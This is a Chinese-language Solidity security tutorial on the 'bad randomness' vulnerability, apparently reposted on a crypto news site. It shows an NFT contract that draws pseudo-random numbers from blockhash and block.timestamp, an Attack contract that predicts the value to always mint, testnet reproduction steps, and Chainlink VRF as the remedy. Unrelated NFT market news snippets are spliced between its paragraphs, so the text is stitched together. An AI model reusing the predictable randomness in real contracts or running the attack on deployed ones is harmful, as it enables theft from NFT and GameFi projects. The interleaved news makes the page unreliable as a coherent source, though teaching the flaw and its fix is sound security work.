以太坊交易所 以太坊交易所
Ctrl+D 以太坊交易所
ads
首頁 > DOT > Info

WTF Solidity 合約安全: S07. 壞隨機數

Author:

Time:1900/1/1 0:00:00

我最近在重新學solidity,鞏固一下細節,也寫一個“WTF Solidity極簡入門”,供小白們使用(編程大佬可以另找教程),每周更新1-3講。

這一講,我們將介紹智能合約的壞隨機數(Bad Randomness)漏洞和預防方法,這個漏洞經常在 NFT 和 GameFi 中出現,包括 Meebits,Loots,Wolf Game等。

很多以太坊上的應用都需要用到隨機數,例如NFT隨機抽取tokenId、抽盲盒、gamefi戰斗中隨機分勝負等等。但是由于以太坊上所有數據都是公開透明(public)且確定性(deterministic)的,它沒有其他編程語言一樣給開發者提供生成隨機數的方法,例如random()。很多項目方不得不使用鏈上的偽隨機數生成方法,例如 blockhash() 和 keccak256() 方法。

壞隨機數漏洞:攻擊者可以事先計算這些偽隨機數的結果,從而達到他們想要的目的,例如鑄造任何他們想要的稀有NFT而非隨機抽取。更多的內容可以閱讀 WTF Solidity極簡教程 第39講:偽隨機數。

PeopleDAO與WTF Academy合作,在Goerli測試網上試用Soulbound協議:2月21日消息,PeopleDAO與Web3開源學習社區WTF Academy合作,在Goerli測試網上試用聲譽NFT協議Soulbound。用例類似于獲得課程學分。當WTF學院的學生完成課程后,他們將獲得不可轉讓的證書,即教育證明。

Soulbound選擇Goerli測試網對產品進行Beta測試,因為測試網是編碼人員用來開發和試用智能合約的以太坊區塊鏈的替代版本。一旦該項目從早期用戶那里獲得了足夠的反饋,下一步將部署到合適的以太坊L2網絡。[2023/2/21 12:19:31]

下面我們學習一個有壞隨機數漏洞的 NFT 合約: BadRandomness.sol。

contract BadRandomness is ERC721 {    uint256 totalSupply;    // 構造函數,初始化NFT合集的名稱、代號    constructor() ERC721("", ""){}    // 鑄造函數:當輸入的 luckyNumber 等于隨機數時才能mint    function luckyMint(uint256 luckyNumber) external {        uint256 randomNumber = uint256(keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp))) % 100; // get bad random number        require(randomNumber == luckyNumber, "Better luck next time!");        _mint(msg.sender, totalSupply); // mint        totalSupply++;    }}它有一個主要的鑄造函數 luckyMint(),用戶調用時輸入一個 0-99 的數字,如果和鏈上生成的偽隨機數 randomNumber 相等,即可鑄造幸運 NFT。偽隨機數使用 blockhash 和 block.timestamp 聲稱。這個漏洞在于用戶可以完美預測生成的隨機數并鑄造NFT。

goblintown.wtf系列NFT24小時交易額為90.35萬美元:金色財經消息,據NFTGo.io數據顯示,goblintown.wtf系列NFT總市值達6264萬美元,在所有NFT項目總市值排名中位列第38;其24小時交易額為90.35萬美元,跌幅達12.69%。截止發稿時,該系列NFT當前地板價為3ETH,漲幅為3.81%。[2022/6/13 4:21:22]

下面我們寫個攻擊合約 Attack.sol。

contract Attack {    function attackMint(BadRandomness nftAddr) external {        // 提前計算隨機數        uint256 luckyNumber = uint256(            keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp))        ) % 100;        // 利用 luckyNumber 攻擊        nftAddr.luckyMint(luckyNumber);    }}攻擊函數 attackMint()中的參數為 BadRandomness合約地址。在其中,我們計算了隨機數 luckyNumber,然后將它作為參數輸入到 luckyMint() 函數完成攻擊。由于attackMint()和luckyMint()將在同一個區塊中調用,blockhash和block.timestamp是相同的,利用他們生成的隨機數也相同。

troll-town.wtf系列NFT24小時交易額增幅達312.57%:金色財經消息,據NFTGo.io數據顯示,troll-town.wtf系列NFT總市值達511.08萬美元,在所有NFT項目總市值排名中位列第565;其24小時交易額為129.64萬美元,增幅達312.57%。截止發稿時,該系列NFT當前地板價為0.242ETH。[2022/6/7 4:08:55]

由于 Remix 自帶的 Remix VM不支持 blockhash函數,因此你需要將合約部署到以太坊測試鏈上進行復現。

部署 BadRandomness 合約。

部署 Attack 合約。

將 BadRandomness 合約地址作為參數傳入到 Attack 合約的 attackMint() 函數并調用,完成攻擊。

調用 BadRandomness 合約的 balanceOf 查看Attack 合約NFT余額,確認攻擊成功。

OpenSea上Goblintown.wtf NFT系列地板價達到8ETH:6月2日消息,據OpenSea數據,目前Goblintown.wtf NFT系列地板價今日最高漲至9ETH,目前為8ETH,近7日交易量逾13135枚ETH,累計交易量為21800枚ETH。[2022/6/2 3:58:52]

我們通常使用預言機項目提供的鏈下隨機數來預防這類漏洞,例如 Chainlink VRF。這類隨機數從鏈下生成,然后上傳到鏈上,從而保證隨機數不可預測。更多介紹可以閱讀 WTF Solidity極簡教程 第39講:偽隨機數。

這一講我們介紹了壞隨機數漏洞,并介紹了一個簡單的預防方法:使用預言機項目提供的鏈下隨機數。NFT 和 GameFi 項目方應避免使用鏈上偽隨機數進行抽獎,以防被黑客利用。

推特:@0xAA_Science|@WTFAcademy_

社區:Discord|微信群|官網 wtf.academy

goblintown.wtf系列NFT 24小時交易額超700萬美元,地板價接近6 ETH:6月1日消息,NFTGo.io數據顯示,goblintown.wtf系列NFT 24小時交易額達727.46萬美元,漲幅為165.55%。目前地板價達5.95 ETH,24小時漲幅為70.99%。[2022/6/1 3:56:44]

所有代碼和教程開源在github: github.com/AmazingAng/WTFSolidity

來源:bress

Bress

個人專欄

閱讀更多

金色早8點

比推 Bitpush News

Foresight News

PANews

Delphi Digital

區塊鏈騎士

深潮TechFlow

鏈捕手

區塊律動BlockBeats

DeFi之道

Tags:NBSBSPNFTINTnbs幣未來價格BSPAY幣xNFT ProtocolGINTO價格

DOT
一文回顧2022年傳統巨頭的Web3之路_META:NFT

傳統巨頭沒辦法再忽視 Web3 的崛起,作為在自身領域獲得了最多的資源也是最有能力率先探索神秘的 Web3 世界的公司,從 DeFi、NFT 到元宇宙.

1900/1/1 0:00:00
2022年鏈上之最:6個驚人的數字_APY:TRUSD價格

原文標題:《2022 Blockchain Awards》原文作者:Conor Grogan,Coinbase 戰略主管;前橋水基金經理 原文編譯:czgsws 2022 鏈上遠比以往瘋狂.

1900/1/1 0:00:00
美聯儲表態加速CBDC進程,數字美元即將面世_BDC:ripple

數字美元項目的政策研究總監表示,美聯儲正在等待國會啟動關于CBDC的立法,以便他們進一步推進。世界各地的許多中央銀行一直在研究CBDC,然而,美聯儲在這方面速度有點慢.

1900/1/1 0:00:00
OP Research:2023 Crypto Nomad啟航指南_NOMAD:Nomad Exiles

原文標題:《OP Research:2023 Crypto Nomad 啟航指南》原文作者:CloudY,OP ResearchNomad,游民,原指居無定所的游牧民.

1900/1/1 0:00:00
Gemini 聯創致 DCG 公開信全文:要求償還 9 億美元欠款_BSP:BSPT價格

原文編譯:Loopy LuGemini 聯合創始人 Cameron Winklevoss 代表其 Earn 產品超過 34 .

1900/1/1 0:00:00
加密收益來源:并不是所有收益都是平等的_ETH:DEF

文章作者:Mikey 0x去中心化金融(即DeFi)的主要優勢之一是,它開放給任何人,任何人都可以隨時隨地參與.

1900/1/1 0:00:00
ads